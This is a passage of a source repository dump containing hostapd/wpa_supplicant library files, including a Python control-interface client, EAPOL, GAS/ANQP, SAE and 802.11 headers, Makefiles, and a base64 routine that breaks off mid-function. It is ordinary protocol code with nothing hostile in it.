"Received pending event" 168 | }, 169 | { NULL, NULL, 0, NULL } 170 | }; 171 | 172 | static PyMemberDef wpaspy_members[] = { 173 | { 174 | "attached", T_INT, offsetof(struct wpaspy_obj, attached), 175 | READONLY, 176 | "Whether instance is attached as event monitor" 177 | }, 178 | { NULL } 179 | }; 180 | 181 | static PyTypeObject wpaspy_ctrl = { 182 | PyObject_HEAD_INIT(NULL) 183 | .tp_name = "wpaspy.Ctrl", 184 | .tp_basicsize = sizeof(struct wpaspy_obj), 185 | .tp_getattro = PyObject_GenericGetAttr, 186 | .tp_setattro = PyObject_GenericSetAttr, 187 | .tp_flags = Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, 188 | .tp_methods = wpaspy_methods, 189 | .tp_members = wpaspy_members, 190 | .tp_init = (initproc) wpaspy_open, 191 | .tp_dealloc = (destructor) wpaspy_close, 192 | .tp_new = PyType_GenericNew, 193 | }; 194 | 195 | 196 | static PyMethodDef module_methods[] = { 197 | { NULL, NULL, 0, NULL } 198 | }; 199 | 200 | 201 | PyMODINIT_FUNC initwpaspy(void) 202 | { 203 | PyObject *mod; 204 | 205 | PyType_Ready(&wpaspy_ctrl); 206 | mod = Py_InitModule("wpaspy", module_methods); 207 | wpaspy_error = PyErr_NewException("wpaspy.error", NULL, NULL); 208 | 209 | Py_INCREF(&wpaspy_ctrl); 210 | Py_INCREF(wpaspy_error); 211 | 212 | PyModule_AddObject(mod, "Ctrl", (PyObject *) &wpaspy_ctrl); 213 | PyModule_AddObject(mod, "error", wpaspy_error); 214 | } 215 | -------------------------------------------------------------------------------- /module/Auto_EAP/lib/wpaspy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # wpa_supplicant/hostapd control interface using Python 4 | # Copyright (c) 2013, Jouni Malinen 5 | # 6 | # This software may be distributed under the terms of the BSD license. 7 | # See README for more details. 8 | 9 | import os 10 | import socket 11 | import select 12 | 13 | counter = 0 14 | 15 | class Ctrl: 16 | def __init__(self, path): 17 | global counter 18 | self.started = False 19 | self.attached = False 20 | self.s = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) 21 | self.dest = path 22 | self.local = "/tmp/wpa_ctrl_" + str(os.getpid()) + '-' + str(counter) 23 | counter += 1 24 | self.s.bind(self.local) 25 | self.s.connect(self.dest) 26 | self.started = True 27 | 28 | def __del__(self): 29 | self.close() 30 | 31 | def close(self): 32 | if self.attached: 33 | self.detach() 34 | if self.started: 35 | self.s.close() 36 | os.unlink(self.local) 37 | self.started = False 38 | 39 | def request(self, cmd): 40 | self.s.send(cmd) 41 | [r, w, e] = select.select([self.s], [], [], 10) 42 | if r: 43 | return self.s.recv(4096) 44 | raise Exception("Timeout on waiting response") 45 | 46 | def attach(self): 47 | if self.attached: 48 | return None 49 | res = self.request("ATTACH") 50 | if "OK" in res: 51 | return None 52 | raise Exception("ATTACH failed") 53 | 54 | def detach(self): 55 | if not self.attached: 56 | return None 57 | res = self.request("DETACH") 58 | if "OK" in res: 59 | return None 60 | raise Exception("DETACH failed") 61 | 62 | def pending(self): 63 | [r, w, e] = select.select([self.s], [], [], 0) 64 | if r: 65 | return True 66 | return False 67 | 68 | def recv(self): 69 | res = self.s.recv(4096) 70 | return res 71 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | @echo Nothing to be made. 3 | 4 | clean: 5 | rm -f *~ *.o *.d 6 | 7 | install: 8 | @echo Nothing to be made. 9 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/eapol_common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * EAPOL definitions shared between hostapd and wpa_supplicant 3 | * Copyright (c) 2002-2007, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef EAPOL_COMMON_H 10 | #define EAPOL_COMMON_H 11 | 12 | /* IEEE Std 802.1X-2004 */ 13 | 14 | #ifdef _MSC_VER 15 | #pragma pack(push, 1) 16 | #endif /* _MSC_VER */ 17 | 18 | struct ieee802_1x_hdr { 19 | u8 version; 20 | u8 type; 21 | be16 length; 22 | /* followed by length octets of data */ 23 | } STRUCT_PACKED; 24 | 25 | #ifdef _MSC_VER 26 | #pragma pack(pop) 27 | #endif /* _MSC_VER */ 28 | 29 | #define EAPOL_VERSION 2 30 | 31 | enum { IEEE802_1X_TYPE_EAP_PACKET = 0, 32 | IEEE802_1X_TYPE_EAPOL_START = 1, 33 | IEEE802_1X_TYPE_EAPOL_LOGOFF = 2, 34 | IEEE802_1X_TYPE_EAPOL_KEY = 3, 35 | IEEE802_1X_TYPE_EAPOL_ENCAPSULATED_ASF_ALERT = 4 36 | }; 37 | 38 | enum { EAPOL_KEY_TYPE_RC4 = 1, EAPOL_KEY_TYPE_RSN = 2, 39 | EAPOL_KEY_TYPE_WPA = 254 }; 40 | 41 | 42 | #define IEEE8021X_REPLAY_COUNTER_LEN 8 43 | #define IEEE8021X_KEY_SIGN_LEN 16 44 | #define IEEE8021X_KEY_IV_LEN 16 45 | 46 | #define IEEE8021X_KEY_INDEX_FLAG 0x80 47 | #define IEEE8021X_KEY_INDEX_MASK 0x03 48 | 49 | #ifdef _MSC_VER 50 | #pragma pack(push, 1) 51 | #endif /* _MSC_VER */ 52 | 53 | struct ieee802_1x_eapol_key { 54 | u8 type; 55 | /* Note: key_length is unaligned */ 56 | u8 key_length[2]; 57 | /* does not repeat within the life of the keying material used to 58 | * encrypt the Key field; 64-bit NTP timestamp MAY be used here */ 59 | u8 replay_counter[IEEE8021X_REPLAY_COUNTER_LEN]; 60 | u8 key_iv[IEEE8021X_KEY_IV_LEN]; /* cryptographically random number */ 61 | u8 key_index; /* key flag in the most significant bit: 62 | * 0 = broadcast (default key), 63 | * 1 = unicast (key mapping key); key index is in the 64 | * 7 least significant bits */ 65 | /* HMAC-MD5 message integrity check computed with MS-MPPE-Send-Key as 66 | * the key */ 67 | u8 key_signature[IEEE8021X_KEY_SIGN_LEN]; 68 | 69 | /* followed by key: if packet body length = 44 + key length, then the 70 | * key field (of key_length bytes) contains the key in encrypted form; 71 | * if packet body length = 44, key field is absent and key_length 72 | * represents the number of least significant octets from 73 | * MS-MPPE-Send-Key attribute to be used as the keying material; 74 | * RC4 key used in encryption = Key-IV + MS-MPPE-Recv-Key */ 75 | } STRUCT_PACKED; 76 | 77 | #ifdef _MSC_VER 78 | #pragma pack(pop) 79 | #endif /* _MSC_VER */ 80 | 81 | #endif /* EAPOL_COMMON_H */ 82 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/gas.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Generic advertisement service (GAS) (IEEE 802.11u) 3 | * Copyright (c) 2009, Atheros Communications 4 | * Copyright (c) 2011-2012, Qualcomm Atheros 5 | * 6 | * This software may be distributed under the terms of the BSD license. 7 | * See README for more details. 8 | */ 9 | 10 | #include "includes.h" 11 | 12 | #include "common.h" 13 | #include "ieee802_11_defs.h" 14 | #include "gas.h" 15 | 16 | 17 | static struct wpabuf * 18 | gas_build_req(u8 action, u8 dialog_token, size_t size) 19 | { 20 | struct wpabuf *buf; 21 | 22 | buf = wpabuf_alloc(100 + size); 23 | if (buf == NULL) 24 | return NULL; 25 | 26 | wpabuf_put_u8(buf, WLAN_ACTION_PUBLIC); 27 | wpabuf_put_u8(buf, action); 28 | wpabuf_put_u8(buf, dialog_token); 29 | 30 | return buf; 31 | } 32 | 33 | 34 | struct wpabuf * gas_build_initial_req(u8 dialog_token, size_t size) 35 | { 36 | return gas_build_req(WLAN_PA_GAS_INITIAL_REQ, dialog_token, 37 | size); 38 | } 39 | 40 | 41 | struct wpabuf * gas_build_comeback_req(u8 dialog_token) 42 | { 43 | return gas_build_req(WLAN_PA_GAS_COMEBACK_REQ, dialog_token, 0); 44 | } 45 | 46 | 47 | static struct wpabuf * 48 | gas_build_resp(u8 action, u8 dialog_token, u16 status_code, u8 frag_id, 49 | u8 more, u16 comeback_delay, size_t size) 50 | { 51 | struct wpabuf *buf; 52 | 53 | buf = wpabuf_alloc(100 + size); 54 | if (buf == NULL) 55 | return NULL; 56 | 57 | wpabuf_put_u8(buf, WLAN_ACTION_PUBLIC); 58 | wpabuf_put_u8(buf, action); 59 | wpabuf_put_u8(buf, dialog_token); 60 | wpabuf_put_le16(buf, status_code); 61 | if (action == WLAN_PA_GAS_COMEBACK_RESP) 62 | wpabuf_put_u8(buf, frag_id | (more ? 0x80 : 0)); 63 | wpabuf_put_le16(buf, comeback_delay); 64 | 65 | return buf; 66 | } 67 | 68 | 69 | struct wpabuf * 70 | gas_build_initial_resp(u8 dialog_token, u16 status_code, u16 comeback_delay, 71 | size_t size) 72 | { 73 | return gas_build_resp(WLAN_PA_GAS_INITIAL_RESP, dialog_token, 74 | status_code, 0, 0, comeback_delay, size); 75 | } 76 | 77 | 78 | static struct wpabuf * 79 | gas_build_comeback_resp(u8 dialog_token, u16 status_code, u8 frag_id, u8 more, 80 | u16 comeback_delay, size_t size) 81 | { 82 | return gas_build_resp(WLAN_PA_GAS_COMEBACK_RESP, dialog_token, 83 | status_code, frag_id, more, comeback_delay, 84 | size); 85 | } 86 | 87 | 88 | /** 89 | * gas_add_adv_proto_anqp - Add an Advertisement Protocol element 90 | * @buf: Buffer to which the element is added 91 | * @query_resp_len_limit: Query Response Length Limit in units of 256 octets 92 | * @pame_bi: Pre-Association Message Exchange BSSID Independent (0/1) 93 | * 94 | * 95 | * @query_resp_len_limit is 0 for request and 1-0x7f for response. 0x7f means 96 | * that the maximum limit is determined by the maximum allowable number of 97 | * fragments in the GAS Query Response Fragment ID. 98 | */ 99 | static void gas_add_adv_proto_anqp(struct wpabuf *buf, u8 query_resp_len_limit, 100 | u8 pame_bi) 101 | { 102 | /* Advertisement Protocol IE */ 103 | wpabuf_put_u8(buf, WLAN_EID_ADV_PROTO); 104 | wpabuf_put_u8(buf, 2); /* Length */ 105 | wpabuf_put_u8(buf, (query_resp_len_limit & 0x7f) | 106 | (pame_bi ? 0x80 : 0)); 107 | /* Advertisement Protocol */ 108 | wpabuf_put_u8(buf, ACCESS_NETWORK_QUERY_PROTOCOL); 109 | } 110 | 111 | 112 | struct wpabuf * gas_anqp_build_initial_req(u8 dialog_token, size_t size) 113 | { 114 | struct wpabuf *buf; 115 | 116 | buf = gas_build_initial_req(dialog_token, 4 + size); 117 | if (buf == NULL) 118 | return NULL; 119 | 120 | gas_add_adv_proto_anqp(buf, 0, 0); 121 | 122 | wpabuf_put(buf, 2); /* Query Request Length to be filled */ 123 | 124 | return buf; 125 | } 126 | 127 | 128 | struct wpabuf * gas_anqp_build_initial_resp(u8 dialog_token, u16 status_code, 129 | u16 comeback_delay, size_t size) 130 | { 131 | struct wpabuf *buf; 132 | 133 | buf = gas_build_initial_resp(dialog_token, status_code, comeback_delay, 134 | 4 + size); 135 | if (buf == NULL) 136 | return NULL; 137 | 138 | gas_add_adv_proto_anqp(buf, 0x7f, 0); 139 | 140 | wpabuf_put(buf, 2); /* Query Response Length to be filled */ 141 | 142 | return buf; 143 | } 144 | 145 | 146 | struct wpabuf * gas_anqp_build_initial_resp_buf(u8 dialog_token, 147 | u16 status_code, 148 | u16 comeback_delay, 149 | struct wpabuf *payload) 150 | { 151 | struct wpabuf *buf; 152 | 153 | buf = gas_anqp_build_initial_resp(dialog_token, status_code, 154 | comeback_delay, 155 | payload ? wpabuf_len(payload) : 0); 156 | if (buf == NULL) 157 | return NULL; 158 | 159 | if (payload) 160 | wpabuf_put_buf(buf, payload); 161 | 162 | gas_anqp_set_len(buf); 163 | 164 | return buf; 165 | } 166 | 167 | 168 | struct wpabuf * gas_anqp_build_comeback_resp(u8 dialog_token, u16 status_code, 169 | u8 frag_id, u8 more, 170 | u16 comeback_delay, size_t size) 171 | { 172 | struct wpabuf *buf; 173 | 174 | buf = gas_build_comeback_resp(dialog_token, status_code, 175 | frag_id, more, comeback_delay, 4 + size); 176 | if (buf == NULL) 177 | return NULL; 178 | 179 | gas_add_adv_proto_anqp(buf, 0x7f, 0); 180 | 181 | wpabuf_put(buf, 2); /* Query Response Length to be filled */ 182 | 183 | return buf; 184 | } 185 | 186 | 187 | struct wpabuf * gas_anqp_build_comeback_resp_buf(u8 dialog_token, 188 | u16 status_code, 189 | u8 frag_id, u8 more, 190 | u16 comeback_delay, 191 | struct wpabuf *payload) 192 | { 193 | struct wpabuf *buf; 194 | 195 | buf = gas_anqp_build_comeback_resp(dialog_token, status_code, frag_id, 196 | more, comeback_delay, 197 | payload ? wpabuf_len(payload) : 0); 198 | if (buf == NULL) 199 | return NULL; 200 | 201 | if (payload) 202 | wpabuf_put_buf(buf, payload); 203 | 204 | gas_anqp_set_len(buf); 205 | 206 | return buf; 207 | } 208 | 209 | 210 | /** 211 | * gas_anqp_set_len - Set Query Request/Response Length 212 | * @buf: GAS message 213 | * 214 | * This function is used to update the Query Request/Response Length field once 215 | * the payload has been filled. 216 | */ 217 | void gas_anqp_set_len(struct wpabuf *buf) 218 | { 219 | u8 action; 220 | size_t offset; 221 | u8 *len; 222 | 223 | if (buf == NULL || wpabuf_len(buf) < 2) 224 | return; 225 | 226 | action = *(wpabuf_head_u8(buf) + 1); 227 | switch (action) { 228 | case WLAN_PA_GAS_INITIAL_REQ: 229 | offset = 3 + 4; 230 | break; 231 | case WLAN_PA_GAS_INITIAL_RESP: 232 | offset = 7 + 4; 233 | break; 234 | case WLAN_PA_GAS_COMEBACK_RESP: 235 | offset = 8 + 4; 236 | break; 237 | default: 238 | return; 239 | } 240 | 241 | if (wpabuf_len(buf) < offset + 2) 242 | return; 243 | 244 | len = wpabuf_mhead_u8(buf) + offset; 245 | WPA_PUT_LE16(len, (u8 *) wpabuf_put(buf, 0) - len - 2); 246 | } 247 | 248 | 249 | /** 250 | * gas_anqp_add_element - Add ANQP element header 251 | * @buf: GAS message 252 | * @info_id: ANQP Info ID 253 | * Returns: Pointer to the Length field for gas_anqp_set_element_len() 254 | */ 255 | u8 * gas_anqp_add_element(struct wpabuf *buf, u16 info_id) 256 | { 257 | wpabuf_put_le16(buf, info_id); 258 | return wpabuf_put(buf, 2); /* Length to be filled */ 259 | } 260 | 261 | 262 | /** 263 | * gas_anqp_set_element_len - Update ANQP element Length field 264 | * @buf: GAS message 265 | * @len_pos: Length field position from gas_anqp_add_element() 266 | * 267 | * This function is called after the ANQP element payload has been added to the 268 | * buffer. 269 | */ 270 | void gas_anqp_set_element_len(struct wpabuf *buf, u8 *len_pos) 271 | { 272 | WPA_PUT_LE16(len_pos, (u8 *) wpabuf_put(buf, 0) - len_pos - 2); 273 | } 274 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/gas.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Generic advertisement service (GAS) (IEEE 802.11u) 3 | * Copyright (c) 2009, Atheros Communications 4 | * Copyright (c) 2011-2012, Qualcomm Atheros 5 | * 6 | * This software may be distributed under the terms of the BSD license. 7 | * See README for more details. 8 | */ 9 | 10 | #ifndef GAS_H 11 | #define GAS_H 12 | 13 | struct wpabuf * gas_build_initial_req(u8 dialog_token, size_t size); 14 | struct wpabuf * gas_build_comeback_req(u8 dialog_token); 15 | struct wpabuf * gas_build_initial_resp(u8 dialog_token, u16 status_code, 16 | u16 comeback_delay, size_t size); 17 | struct wpabuf * gas_anqp_build_initial_req(u8 dialog_token, size_t size); 18 | struct wpabuf * gas_anqp_build_initial_resp(u8 dialog_token, u16 status_code, 19 | u16 comeback_delay, size_t size); 20 | struct wpabuf * gas_anqp_build_initial_resp_buf(u8 dialog_token, 21 | u16 status_code, 22 | u16 comeback_delay, 23 | struct wpabuf *payload); 24 | struct wpabuf * gas_anqp_build_comeback_resp(u8 dialog_token, u16 status_code, 25 | u8 frag_id, u8 more, 26 | u16 comeback_delay, size_t size); 27 | struct wpabuf * gas_anqp_build_comeback_resp_buf(u8 dialog_token, 28 | u16 status_code, 29 | u8 frag_id, u8 more, 30 | u16 comeback_delay, 31 | struct wpabuf *payload); 32 | void gas_anqp_set_len(struct wpabuf *buf); 33 | 34 | u8 * gas_anqp_add_element(struct wpabuf *buf, u16 info_id); 35 | void gas_anqp_set_element_len(struct wpabuf *buf, u8 *len_pos); 36 | 37 | #endif /* GAS_H */ 38 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/ieee802_11_common.h: -------------------------------------------------------------------------------- 1 | /* 2 | * IEEE 802.11 Common routines 3 | * Copyright (c) 2002-2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef IEEE802_11_COMMON_H 10 | #define IEEE802_11_COMMON_H 11 | 12 | /* Parsed Information Elements */ 13 | struct ieee802_11_elems { 14 | const u8 *ssid; 15 | const u8 *supp_rates; 16 | const u8 *fh_params; 17 | const u8 *ds_params; 18 | const u8 *cf_params; 19 | const u8 *tim; 20 | const u8 *ibss_params; 21 | const u8 *challenge; 22 | const u8 *erp_info; 23 | const u8 *ext_supp_rates; 24 | const u8 *wpa_ie; 25 | const u8 *rsn_ie; 26 | const u8 *wmm; /* WMM Information or Parameter Element */ 27 | const u8 *wmm_tspec; 28 | const u8 *wps_ie; 29 | const u8 *power_cap; 30 | const u8 *supp_channels; 31 | const u8 *mdie; 32 | const u8 *ftie; 33 | const u8 *timeout_int; 34 | const u8 *ht_capabilities; 35 | const u8 *ht_operation; 36 | const u8 *vht_capabilities; 37 | const u8 *vht_operation; 38 | const u8 *vendor_ht_cap; 39 | const u8 *p2p; 40 | const u8 *wfd; 41 | const u8 *link_id; 42 | const u8 *interworking; 43 | const u8 *hs20; 44 | const u8 *ext_capab; 45 | const u8 *bss_max_idle_period; 46 | const u8 *ssid_list; 47 | 48 | u8 ssid_len; 49 | u8 supp_rates_len; 50 | u8 fh_params_len; 51 | u8 ds_params_len; 52 | u8 cf_params_len; 53 | u8 tim_len; 54 | u8 ibss_params_len; 55 | u8 challenge_len; 56 | u8 erp_info_len; 57 | u8 ext_supp_rates_len; 58 | u8 wpa_ie_len; 59 | u8 rsn_ie_len; 60 | u8 wmm_len; /* 7 = WMM Information; 24 = WMM Parameter */ 61 | u8 wmm_tspec_len; 62 | u8 wps_ie_len; 63 | u8 power_cap_len; 64 | u8 supp_channels_len; 65 | u8 mdie_len; 66 | u8 ftie_len; 67 | u8 timeout_int_len; 68 | u8 ht_capabilities_len; 69 | u8 ht_operation_len; 70 | u8 vht_capabilities_len; 71 | u8 vht_operation_len; 72 | u8 vendor_ht_cap_len; 73 | u8 p2p_len; 74 | u8 wfd_len; 75 | u8 interworking_len; 76 | u8 hs20_len; 77 | u8 ext_capab_len; 78 | u8 ssid_list_len; 79 | }; 80 | 81 | typedef enum { ParseOK = 0, ParseUnknown = 1, ParseFailed = -1 } ParseRes; 82 | 83 | ParseRes ieee802_11_parse_elems(const u8 *start, size_t len, 84 | struct ieee802_11_elems *elems, 85 | int show_errors); 86 | int ieee802_11_ie_count(const u8 *ies, size_t ies_len); 87 | struct wpabuf * ieee802_11_vendor_ie_concat(const u8 *ies, size_t ies_len, 88 | u32 oui_type); 89 | struct ieee80211_hdr; 90 | const u8 * get_hdr_bssid(const struct ieee80211_hdr *hdr, size_t len); 91 | 92 | struct hostapd_wmm_ac_params { 93 | int cwmin; 94 | int cwmax; 95 | int aifs; 96 | int txop_limit; /* in units of 32us */ 97 | int admission_control_mandatory; 98 | }; 99 | 100 | int hostapd_config_wmm_ac(struct hostapd_wmm_ac_params wmm_ac_params[], 101 | const char *name, const char *val); 102 | enum hostapd_hw_mode ieee80211_freq_to_chan(int freq, u8 *channel); 103 | 104 | #endif /* IEEE802_11_COMMON_H */ 105 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/privsep_commands.h: -------------------------------------------------------------------------------- 1 | /* 2 | * WPA Supplicant - privilege separation commands 3 | * Copyright (c) 2007-2009, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef PRIVSEP_COMMANDS_H 10 | #define PRIVSEP_COMMANDS_H 11 | 12 | enum privsep_cmd { 13 | PRIVSEP_CMD_REGISTER, 14 | PRIVSEP_CMD_UNREGISTER, 15 | PRIVSEP_CMD_SCAN, 16 | PRIVSEP_CMD_GET_SCAN_RESULTS, 17 | PRIVSEP_CMD_ASSOCIATE, 18 | PRIVSEP_CMD_GET_BSSID, 19 | PRIVSEP_CMD_GET_SSID, 20 | PRIVSEP_CMD_SET_KEY, 21 | PRIVSEP_CMD_GET_CAPA, 22 | PRIVSEP_CMD_L2_REGISTER, 23 | PRIVSEP_CMD_L2_UNREGISTER, 24 | PRIVSEP_CMD_L2_NOTIFY_AUTH_START, 25 | PRIVSEP_CMD_L2_SEND, 26 | PRIVSEP_CMD_SET_COUNTRY, 27 | }; 28 | 29 | struct privsep_cmd_associate 30 | { 31 | u8 bssid[ETH_ALEN]; 32 | u8 ssid[32]; 33 | size_t ssid_len; 34 | int freq; 35 | int pairwise_suite; 36 | int group_suite; 37 | int key_mgmt_suite; 38 | int auth_alg; 39 | int mode; 40 | size_t wpa_ie_len; 41 | /* followed by wpa_ie_len bytes of wpa_ie */ 42 | }; 43 | 44 | struct privsep_cmd_set_key 45 | { 46 | int alg; 47 | u8 addr[ETH_ALEN]; 48 | int key_idx; 49 | int set_tx; 50 | u8 seq[8]; 51 | size_t seq_len; 52 | u8 key[32]; 53 | size_t key_len; 54 | }; 55 | 56 | enum privsep_event { 57 | PRIVSEP_EVENT_SCAN_RESULTS, 58 | PRIVSEP_EVENT_ASSOC, 59 | PRIVSEP_EVENT_DISASSOC, 60 | PRIVSEP_EVENT_ASSOCINFO, 61 | PRIVSEP_EVENT_MICHAEL_MIC_FAILURE, 62 | PRIVSEP_EVENT_INTERFACE_STATUS, 63 | PRIVSEP_EVENT_PMKID_CANDIDATE, 64 | PRIVSEP_EVENT_STKSTART, 65 | PRIVSEP_EVENT_FT_RESPONSE, 66 | PRIVSEP_EVENT_RX_EAPOL, 67 | }; 68 | 69 | #endif /* PRIVSEP_COMMANDS_H */ 70 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/sae.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Simultaneous authentication of equals 3 | * Copyright (c) 2012-2013, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef SAE_H 10 | #define SAE_H 11 | 12 | #define SAE_KCK_LEN 32 13 | #define SAE_PMK_LEN 32 14 | #define SAE_PMKID_LEN 16 15 | #define SAE_KEYSEED_KEY_LEN 32 16 | #define SAE_MAX_PRIME_LEN 512 17 | #define SAE_MAX_ECC_PRIME_LEN 66 18 | #define SAE_COMMIT_MAX_LEN (2 + 3 * SAE_MAX_PRIME_LEN) 19 | #define SAE_CONFIRM_MAX_LEN (2 + SAE_MAX_PRIME_LEN) 20 | 21 | struct sae_temporary_data { 22 | u8 kck[SAE_KCK_LEN]; 23 | struct crypto_bignum *own_commit_scalar; 24 | struct crypto_bignum *own_commit_element_ffc; 25 | struct crypto_ec_point *own_commit_element_ecc; 26 | struct crypto_bignum *peer_commit_element_ffc; 27 | struct crypto_ec_point *peer_commit_element_ecc; 28 | struct crypto_ec_point *pwe_ecc; 29 | struct crypto_bignum *pwe_ffc; 30 | struct crypto_bignum *sae_rand; 31 | struct crypto_ec *ec; 32 | int prime_len; 33 | const struct dh_group *dh; 34 | const struct crypto_bignum *prime; 35 | const struct crypto_bignum *order; 36 | struct crypto_bignum *prime_buf; 37 | struct crypto_bignum *order_buf; 38 | }; 39 | 40 | struct sae_data { 41 | enum { SAE_NOTHING, SAE_COMMITTED, SAE_CONFIRMED, SAE_ACCEPTED } state; 42 | u16 send_confirm; 43 | u8 pmk[SAE_PMK_LEN]; 44 | struct crypto_bignum *peer_commit_scalar; 45 | int group; 46 | struct sae_temporary_data *tmp; 47 | }; 48 | 49 | int sae_set_group(struct sae_data *sae, int group); 50 | void sae_clear_temp_data(struct sae_data *sae); 51 | void sae_clear_data(struct sae_data *sae); 52 | 53 | int sae_prepare_commit(const u8 *addr1, const u8 *addr2, 54 | const u8 *password, size_t password_len, 55 | struct sae_data *sae); 56 | int sae_process_commit(struct sae_data *sae); 57 | void sae_write_commit(struct sae_data *sae, struct wpabuf *buf, 58 | const struct wpabuf *token); 59 | u16 sae_parse_commit(struct sae_data *sae, const u8 *data, size_t len, 60 | const u8 **token, size_t *token_len, int *allowed_groups); 61 | void sae_write_confirm(struct sae_data *sae, struct wpabuf *buf); 62 | int sae_check_confirm(struct sae_data *sae, const u8 *data, size_t len); 63 | 64 | #endif /* SAE_H */ 65 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/common/version.h: -------------------------------------------------------------------------------- 1 | #ifndef VERSION_H 2 | #define VERSION_H 3 | 4 | #ifndef VERSION_STR_POSTFIX 5 | #define VERSION_STR_POSTFIX "" 6 | #endif /* VERSION_STR_POSTFIX */ 7 | 8 | #define VERSION_STR "2.1-devel" VERSION_STR_POSTFIX 9 | 10 | #endif /* VERSION_H */ 11 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/Makefile: -------------------------------------------------------------------------------- 1 | all: libutils.a 2 | 3 | clean: 4 | rm -f *~ *.o *.d libutils.a 5 | 6 | install: 7 | @echo Nothing to be made. 8 | 9 | 10 | include ../lib.rules 11 | 12 | #CFLAGS += -DWPA_TRACE 13 | CFLAGS += -DCONFIG_IPV6 14 | 15 | LIB_OBJS= \ 16 | base64.o \ 17 | bitfield.o \ 18 | common.o \ 19 | ip_addr.o \ 20 | radiotap.o \ 21 | trace.o \ 22 | uuid.o \ 23 | wpa_debug.o \ 24 | wpabuf.o 25 | 26 | # Pick correct OS wrapper implementation 27 | LIB_OBJS += os_unix.o 28 | 29 | # Pick correct event loop implementation 30 | LIB_OBJS += eloop.o 31 | 32 | # Pick correct edit implementation 33 | LIB_OBJS += edit.o 34 | 35 | #LIB_OBJS += pcsc_funcs.o 36 | 37 | libutils.a: $(LIB_OBJS) 38 | $(AR) crT $@ $? 39 | 40 | -include $(OBJS:%.o=%.d) 41 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/base64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Base64 encoding/decoding (RFC1341) 3 | * Copyright (c) 2005-2011, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "os.h" 12 | #include "base64.h" 13 | 14 | static const unsigned char base64_table[65] = 15 | "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 16 | 17 | /** 18 | * base64_encode - Base64 encode 19 | * @src: Data to be encoded 20 | * @len: Length of the data to be encoded 21 | * @out_len: Pointer to output length variable, or %NULL if not used 22 | * Returns: Allocated buffer of out_len bytes of encoded data, 23 | * or %NULL on failure 24 | * 25 | * Caller is responsible for freeing the returned buffer. Returned buffer is 26 | * nul terminated to make it easier to use as a C string. The nul terminator is 27 | * not included in out_len. 28 | */ 29 | unsigned char * base64_encode(const unsigned char *src, size_t len, 30 | size_t *out_len) 31 | { 32 | unsigned char *out, *pos; 33 | const unsigned char *end, *in; 34 | size_t olen; 35 | int line_len; 36 | 37 | olen = len * 4 / 3 + 4; /* 3-byte blocks to 4-byte */ 38 | olen += olen / 72; /* line feeds */ 39 | olen++; /* nul termination */ 40 | if (olen < len) 41 | return NULL; /* integer overflow */ 42 | out = os_malloc(olen); 43 | if (out == NULL) 44 | return NULL; 45 | 46 | end = src + len; 47 | in = src; 48 | pos = out; 49 | line_len = 0; 50 | while (end - in >= 3) { 51 | *pos++ = base64_table[in[0] >> 2]; 52 | *pos++ = base64_table[((in[0] & 0x03) << 4) | (in[1] >> 4)]; 53 | *pos++ = base64_table[((in[1] & 0x0f) << 2) | (in[2] >> 6)]; 54 | *pos++ = base64_table[in[2] & 0x3f]; 55 | in += 3; 56 | line_len += 4; 57 | if (line_len >= 72) { 58 | *pos++ = '\n'; 59 | line_len = 0; 60 | } 61 | } 62 | 63 | if (end - in) { 64 | *pos++ = base64_table[in[0] >> 2]; 65 | if (end - in == 1) { 66 | *pos++ = base64_table[(in[0] & 0x03) << 4]; 67 | *pos++ = '='; 68 | } else { 69 | *pos++ = base64_table[((in[0] & 0x03) << 4) | 70 | (in[1] >> 4)]; 71 | *pos++ = base64_table[(in[1] & 0x0f) << 2]; 72 | } 73 | *pos++ = '='; 74 | line_len += 4; 75 | } 76 | 77 | if (line_len) 78 | *pos++ = '\n'; 79 | 80 | *pos = '\0'; 81 | if (out_len) 82 | *out_len = pos - out; 83 | return out; 84 | } 85 | 86 | 87 | /** 88 | * base64_decode - Base64 decode 89 | * @src: Data to be decoded 90 | * @len: Length of the data to be decoded 91 | * @out_len: Pointer to output length variable 92 | * Returns: Allocated buffer of out_len bytes of decoded data, 93 | * or %NULL on failure 94 | * 95 | * Caller is responsible for freeing the returned buffer. 96 | */ 97 | unsigned char * base64_decode(const unsigned char *src, size_t len, 98 | size_t *out_len) 99 | { 100 | unsigned char dtable[256], *out, *pos, block[4], tmp; 101 | size_t i, count, olen; 102 | int pad = 0; 103 | 104 | os_memset(dtable, 0x80, 256); 105 | for (i = 0; i < sizeof(base64_table) - 1; i++) 106 | dtable[base64_table[i]] = (unsigned char) i; 107 | dtable['='] = 0; 108 | 109 | count = 0; 110 | for (i = 0; i < len; i++) { 111 | if (dtable[src[i]] != 0x80) 112 | count++; 113 | } 114 | 115 | if (count == 0 || count % 4) 116 | return NULL; 117 | 118 | olen = count / 4 * 3; 119 | pos = out = 